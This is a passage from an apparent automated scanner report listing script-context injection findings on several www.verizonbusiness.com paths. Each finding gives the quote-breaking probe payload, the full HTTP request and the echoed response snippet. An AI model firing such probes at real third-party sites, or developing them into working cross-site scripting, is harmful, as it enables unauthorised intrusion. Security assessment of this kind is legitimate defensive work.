Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security/prof-svcs36f1d"%3b6f0599a3638/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:14 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43498
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:14 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
{}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/security/prof-svcs36f1d";6f0599a3638/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.312. http://www.verizonbusiness.com/Products/security/prof-svcs/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/prof-svcs/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d8ce'%3bc6452b4e25e was submitted in the REST URL parameter 3. This input was echoed as 5d8ce';c6452b4e25e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security/prof-svcs5d8ce'%3bc6452b4e25e/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:22 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43496
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:22 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/security/prof-svcs5d8ce';c6452b4e25e/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.313. http://www.verizonbusiness.com/Products/security/risk/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/risk/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b698'%3be644f6c6049 was submitted in the REST URL parameter 1. This input was echoed as 9b698';e644f6c6049 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products9b698'%3be644f6c6049/security/risk/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:42:55 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40644
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:55 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products9b698';e644f6c6049/security/risk/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.314. http://www.verizonbusiness.com/Products/security/risk/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/risk/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca1e2"%3b895eeb0feb6 was submitted in the REST URL parameter 1. This input was echoed as ca1e2";895eeb0feb6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsca1e2"%3b895eeb0feb6/security/risk/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:18 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40644
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:18 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:18 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Productsca1e2";895eeb0feb6/security/risk/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.315. http://www.verizonbusiness.com/Products/security/risk/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/risk/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8fc7d'%3b7472ba30d19 was submitted in the REST URL parameter 2. This input was echoed as 8fc7d';7472ba30d19 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security8fc7d'%3b7472ba30d19/risk/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:16 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42309
Date: Wed, 17 Nov 2010 00:44:16 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/security8fc7d';7472ba30d19/risk/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.316. http://www.verizonbusiness.com/Products/security/risk/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/risk/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 638eb"%3b3e97688d0a was submitted in the REST URL parameter 2. This input was echoed as 638eb";3e97688d0a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security638eb"%3b3e97688d0a/risk/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:43:34 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42307
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:43:34 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:43:34 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/security638eb";3e97688d0a/risk/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT
...[SNIP]...

1.317. http://www.verizonbusiness.com/Products/security/risk/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/risk/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33f17'%3bb99e5a99ddf was submitted in the REST URL parameter 3. This input was echoed as 33f17';b99e5a99ddf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security/risk33f17'%3bb99e5a99ddf/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:43 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43488
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:43 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:43 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/security/risk33f17';b99e5a99ddf/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.318. http://www.verizonbusiness.com/Products/security/risk/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/risk/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee991"%3b3c03f9138ac was submitted in the REST URL parameter 3. This input was echoed as ee991";3c03f9138ac in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security/riskee991"%3b3c03f9138ac/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:35 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43486
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:35 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
h(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/security/riskee991";3c03f9138ac/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.319. http://www.verizonbusiness.com/about/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6009"%3b177eb6f1c36 was submitted in the REST URL parameter 1. This input was echoed as f6009";177eb6f1c36 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutf6009"%3b177eb6f1c36/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:57 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40612
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:57 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/aboutf6009";177eb6f1c36/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.320. http://www.verizonbusiness.com/about/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d96e'%3ba6921a723ab was submitted in the REST URL parameter 1. This input was echoed as 2d96e';a6921a723ab in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about2d96e'%3ba6921a723ab/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:18 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40612
Date: Wed, 17 Nov 2010 00:47:18 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:18 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/about2d96e';a6921a723ab/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.321. http://www.verizonbusiness.com/about/company/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/company/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74ca5"%3bb75f8746d3e was submitted in the REST URL parameter 1. This input was echoed as 74ca5";b75f8746d3e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about74ca5"%3bb75f8746d3e/company/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:42 GMT
Content-Type: text/html
Content-Length: 40628
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:52:42 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:42 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about74ca5";b75f8746d3e/company/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUB
...[SNIP]...

1.322. http://www.verizonbusiness.com/about/company/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/company/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1cd00'%3bbd1e2bc7aa was submitted in the REST URL parameter 1. This input was echoed as 1cd00';bd1e2bc7aa in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about1cd00'%3bbd1e2bc7aa/company/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:52:50 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40624
Date: Wed, 17 Nov 2010 00:52:50 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:50 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about1cd00';bd1e2bc7aa/company/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.323. http://www.verizonbusiness.com/about/company/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/company/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60103"%3b4e0dd501f85 was submitted in the REST URL parameter 2. This input was echoed as 60103";4e0dd501f85 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/company60103"%3b4e0dd501f85/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:52:57 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 47087
Date: Wed, 17 Nov 2010 00:52:57 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/company60103";4e0dd501f85/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.324. http://www.verizonbusiness.com/about/company/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/company/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a39dc'%3b3e6cb8d10dd was submitted in the REST URL parameter 2. This input was echoed as a39dc';3e6cb8d10dd in the application's response.

